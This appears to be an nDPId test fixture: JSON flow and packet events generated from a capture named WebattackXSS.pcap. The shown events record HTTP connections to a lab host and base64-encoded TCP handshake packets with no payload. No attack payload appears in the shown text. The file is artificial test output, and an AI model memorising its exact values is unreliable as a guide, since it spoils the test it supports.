+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347731797,"flow_last_seen":1499347736820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60342,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347733083,"flow_last_seen":1499347738820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60356,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347734348,"flow_last_seen":1499347739820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60370,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347867086,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347867086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sxZAAD4GErqsEAABwKgKMoL2AFBvHeVWAAAAAKACchAvzQAAAgQFtAQCCAoBPFZAAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":1499347867086,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgvZcEWBbbx3lV6AScSBIpAAAAgQFtAQCCAoD5ie1ATxWQAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":3,"flow_last_seen":1499347867087,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347867087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sxdAAD4GEsGsEAABwKgKMoL2AFBvHeVXXBFgXIAQAOXnqwAAAQEICgE8VkAD5ie1"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347868358,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347868358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8189AAD4G7gCsEAABwKgKMoMEAFA06oCxAAAAAKACchDNWQAAAgQFtAQCCAoBPFd+AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":1499347868358,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgwSCLK7WNOqAsqAScSBwXAAAAgQFtAQCCAoD5ijzATxXfgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":3,"flow_last_seen":1499347868359,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347868359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA019BAAD4G7gesEAABwKgKMoMEAFA06oCygiyu14AQAOUPZAAAAQEICgE8V34D5ijz"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347869628,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347869628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbNAAD4GaB2sEAABwKgKMoMSAFAbjgUPAAAAAKACchBhDAAAAgQFtAQCCAoBPFi8AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7504,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":2,"flow_last_seen":1499347869628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgxKd9DBxG44FEKAScSBlbwAAAgQFtAQCCAoD5iowATxYvAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":3,"flow_last_seen":1499347869629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347869629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbRAAD4GaCSsEAABwKgKMoMSAFAbjgUQnfQwcoAQAOUEdwAAAQEICgE8WLwD5iow"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347872187,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347872187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ycVAAD4G\/AqsEAABwKgKMoMsAFDCtZL+AAAAAKACchApXAAAAgQFtAQCCAoBPFs7AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":2,"flow_last_seen":1499347872187,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgyztIpfbwrWS\/6AScSB0pgAAAgQFtAQCCAoD5iywATxbOwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":3,"flow_last_seen":1499347872188,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347872188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ycZAAD4G\/BGsEAABwKgKMoMsAFDCtZL\/7SKX3IAQAOUTrQAAAQEICgE8WzwD5iyw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347873465,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347873465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+eFAAD4Gy+6sEAABwKgKMoM6AFCd+qWaAAAAAKACchA6LQAAAgQFtAQCCAoBPFx7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7534,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":2,"flow_last_seen":1499347873465,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgzpjWOt2nfqlm6AScSC6ZwAAAgQFtAQCCAoD5i3vATxcewEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7536,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":3,"flow_last_seen":1499347873466,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347873466,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+eJAAD4Gy\/WsEAABwKgKMoM6AFCd+qWbY1jrd4AQAOVZbwAAAQEICgE8XHsD5i3v"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347874737,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33608,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347747187,"flow_last_seen":1499347752826,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 